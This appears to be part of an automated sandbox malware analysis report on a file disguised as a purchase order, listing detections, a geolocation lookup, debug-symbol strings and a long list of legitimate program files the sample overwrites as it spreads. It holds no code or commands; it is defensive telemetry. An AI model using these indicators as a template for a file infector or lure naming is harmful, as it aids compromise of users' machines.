Source: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: PO_2024_056209_MQ04865_ENQ_1045.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe

Code function: 34_2_01088286 CryptStringToBinaryA,CryptStringToBinaryA,GetTokenInformation,GetTokenInformation,GetLastError,OpenProcessToken,CloseHandle,GetSidSubAuthorityCount,

34_2_01088286

Source: PO_2024_056209_MQ04865_ENQ_1045.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49752 version: TLS 1.0

Source: PO_2024_056209_MQ04865_ENQ_1045.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: alg.exe, 0000000B.00000003.2296140899.0000000001590000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: GoogleUpdateCore_unsigned.pdb source: GoogleUpdateCore.exe.11.dr
Source:	Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: alg.exe, 0000000B.00000003.2355912199.00000000007A0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2354806211.0000000000790000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2390611024.0000000000400000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: alg.exe, 0000000B.00000003.1895950529.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: alg.exe, 0000000B.00000003.2117234182.00000000015D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: alg.exe, 0000000B.00000003.2117234182.00000000015D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ADelRCP_Exec.pdb source: alg.exe, 0000000B.00000003.2141944111.00000000015D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mavinject32.pdbGCTL source: alg.exe, 0000000B.00000003.2472348411.00000000007D0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2468389247.00000000007D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\e\src\out\Release_x64\setup.exe.pdbOGP source: setup.exe0.11.dr
Source:	Binary string: _.pdb source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1750433396.00000000012A1000.00000004.00000020.00020000.00000000.sdmp, PO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1769417350.0000000003700000.00000004.08000000.00040000.00000000.sdmp, PO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1793222374.00000000049A5000.00000004.00000800.00020000.00000000.sdmp, PO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1758588393.0000000003533000.00000004.00000020.00020000.00000000.sdmp, zeXKjViL.exe, 00000022.00000002.2045260394.0000000004723000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: crashreporter.pdb source: alg.exe, 0000000B.00000003.2627135802.00000000007B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: alg.exe, 0000000B.00000003.2057910358.0000000001480000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmiregistry_objs\rmiregistry.pdb source: rmiregistry.exe.11.dr
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdbAAAGCTL source: alg.exe, 0000000B.00000003.2278455049.00000000014A0000.00000004.00001000.00020000.00000000.sdmp, MSRMSPIBroker.exe.11.dr
Source:	Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: alg.exe, 0000000B.00000003.2437741303.0000000000470000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: alg.exe, 0000000B.00000003.2303409881.00000000014D0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2310976010.0000000001460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\Acrobat\Installers\BootStrapExe_Small\Release_x64\Setup.pdb source: alg.exe, 0000000B.00000003.2349211706.00000000007A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: alg.exe, 0000000B.00000003.2171393747.00000000015D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: Acrobat_SL.pdb((( source: alg.exe, 0000000B.00000003.1901299127.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: uws\dll\mscorlib.pdbe source: zeXKjViL.exe, 00000022.00000002.2057791312.0000000005E90000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\Aut2Exe\Aut2Exe.pdb source: Aut2exe.exe.11.dr
Source:	Binary string: ADelRCP_Exec.pdbCC9 source: alg.exe, 0000000B.00000003.2141944111.00000000015D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdb source: alg.exe, 0000000B.00000003.1921288633.00000000015A0000.00000004.00001000.00020000.00000000.sdmp, AcroBroker.exe.11.dr
Source:	Binary string: Acrobat_SL.pdb source: alg.exe, 0000000B.00000003.1901299127.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: alg.exe, 0000000B.00000003.2355912199.00000000007A0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2354806211.0000000000790000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2390611024.0000000000400000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\Acrobat\Installers\BootStrapExe_Small\Release_x64\Setup.pdb} source: alg.exe, 0000000B.00000003.2349211706.00000000007A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: alg.exe, 0000000B.00000003.2057910358.0000000001480000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: alg.exe, 0000000B.00000003.2189745074.00000000015D0000.00000004.00001000.00020000.00000000.sdmp, CRWindowsClientService.exe.11.dr
Source:	Binary string: C:\b\s\w\ir\cache\builder\src\out\Release_x64\elevation_service.exe.pdb source: alg.exe, 0000000B.00000003.1814990672.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: alg.exe, 0000000B.00000003.1895950529.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mavinject32.pdb source: alg.exe, 0000000B.00000003.2472348411.00000000007D0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2468389247.00000000007D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: maintenanceservice.pdb source: alg.exe, 0000000B.00000003.1836586414.0000000001620000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 64BitMAPIBroker.pdb source: alg.exe, 0000000B.00000003.2262552254.00000000015D0000.00000004.00001000.00020000.00000000.sdmp, 64BitMAPIBroker.exe.11.dr
Source:	Binary string: D:\a\_work\e\src\out\Release_x64\setup.exe.pdb source: setup.exe0.11.dr
Source:	Binary string: GoogleUpdateCore_unsigned.pdbV source: GoogleUpdateCore.exe.11.dr
Source:	Binary string: firefox.pdb source: alg.exe, 0000000B.00000003.2654415779.00000000007B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: alg.exe, 0000000B.00000003.2437741303.0000000000470000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: alg.exe, 0000000B.00000003.2241398314.00000000015D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: firefox.pdbP source: alg.exe, 0000000B.00000003.2654415779.00000000007B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: alg.exe, 0000000B.00000003.2171393747.00000000015D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: alg.exe, 0000000B.00000003.2189745074.00000000015D0000.00000004.00001000.00020000.00000000.sdmp, CRWindowsClientService.exe.11.dr
Source:	Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: alg.exe, 0000000B.00000003.2246072048.00000000015D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: alg.exe, 0000000B.00000003.2296140899.0000000001590000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdb source: alg.exe, 0000000B.00000003.2278455049.00000000014A0000.00000004.00001000.00020000.00000000.sdmp, MSRMSPIBroker.exe.11.dr
Source:	Binary string: maintenanceservice.pdb` source: alg.exe, 0000000B.00000003.1836586414.0000000001620000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: alg.exe, 0000000B.00000003.2303409881.00000000014D0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2310976010.0000000001460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: alg.exe, 0000000B.00000003.2203720217.00000000015D0000.00000004.00001000.00020000.00000000.sdmp, Eula.exe.11.dr
Source:	Binary string: C:\b\s\w\ir\cache\builder\src\out\Release_x64\chrome_proxy.exe.pdb source: chrome_proxy.exe.11.dr
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmiregistry_objs\rmiregistry.pdb source: rmiregistry.exe.11.dr
Source:	Binary string: mscorlib.pdb source: zeXKjViL.exe, 00000022.00000002.2057791312.0000000005EBC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: d:\dbs\el\omr\target\x64\ship\c2rsvcmgr\x-none\OfficeSvcMgr.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: officesvcmgr.exe.11.dr
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: alg.exe, 0000000B.00000003.1921288633.00000000015A0000.00000004.00001000.00020000.00000000.sdmp, AcroBroker.exe.11.dr
Source:	Binary string: d:\dbs\el\omr\target\x64\ship\c2rsvcmgr\x-none\OfficeSvcMgr.pdb source: officesvcmgr.exe.11.dr
Source:	Binary string: AppVShNotify.pdb source: alg.exe, 0000000B.00000003.2425011073.0000000000440000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: alg.exe, 0000000B.00000003.2246072048.00000000015D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: alg.exe, 0000000B.00000003.2203720217.00000000015D0000.00000004.00001000.00020000.00000000.sdmp, Eula.exe.11.dr
Source:	Binary string: AppVShNotify.pdbGCTL source: alg.exe, 0000000B.00000003.2425011073.0000000000440000.00000004.00001000.00020000.00000000.sdmp

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\pingsender.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	System file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\7-Zip\7z.exe
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	System file written: C:\Windows\System32\AppVClient.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\crashreporter.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\7-Zip\7zG.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\firefox.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\updater.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	System file written: C:\Windows\System32\FXSSVC.exe	Jump to behavior
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	System file written: C:\Windows\System32\alg.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\7-Zip\7zFM.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\private_browsing.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe
